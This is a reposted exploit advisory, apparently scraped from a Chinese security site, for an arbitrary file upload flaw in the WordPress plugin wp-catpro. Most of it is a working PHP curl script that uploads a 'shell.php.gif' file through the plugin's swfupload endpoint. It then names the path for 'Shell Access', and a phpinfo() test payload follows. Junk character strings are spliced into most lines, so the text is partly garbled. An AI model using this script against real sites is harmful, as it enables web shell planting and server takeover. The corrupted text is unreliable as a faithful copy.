WordPress插件wp-catpro任意文件上传

admin

Wordpress plugins - wp-catpro Arbitrary File Upload Vulnerability
% i0 C: N1 P/ N4 U& s" D3 _#-----------------------------------------------------------------------

作者  => Zikou-16
, y9 ?7 T9 T" w' O: F8 j/ x* w邮箱 => zikou16x@gmail.com
测试系统 : Windows 7 , Backtrack 5r3
' i" ?& q/ \5 a) c+ p下载地址 : http://xmlswf.com/images/stories/WP_plugins/wp-catpro.zip
4 _6 p& j3 w& Q+ i9 M####

#=> Exploit 信息:
0 e, Q# o* @4 i------------------
0 a7 P( z1 D  f. q+ P7 s8 c# 攻击者可以上传 file/shell.php.gif
# ("jpg", "gif", "png")  // Allowed file extensions
# "/uploads/";  // The path were we will save the file (getcwd() may not be reliable and should be tested in your environment)
# '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file name (in a Regular Expression format)
4 X8 n$ c, x2 `0 o- Z1 O------------------

0 Q  r5 E. x% d0 K* h8 r#=> Exploit
-----------
<?php

$uploadfile="zik.php.gif";
, ~% g7 C- a( p* h% o2 S$ c* R$ch = curl_init("http://[ www.2cto.com ]/[path]/wp-content/plugins/wp-catpro/js/swfupload/js/upload.php");
curl_setopt($ch, CURLOPT_POST, true);
8 o- n" e( S7 J' J' Zcurl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile",
'folder'=>'/wp-content/uploads/catpro/'));
# i6 k) h& ]. }2 ocurl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
/ @) C- o- `! Z7 U. h
print "$postResult";
+ E9 z, R1 b, M/ U0 w/ s4 I3 a" N
Shell Access : http://[ www.xxx.com ]/[path]/wp-content/uploads/catpro/random_name.php.gif
1 U4 X0 C- {2 b: k7 g  ?>
<?php
( [! m- |8 c0 A+ f* g( s& w9 E! hphpinfo();
?>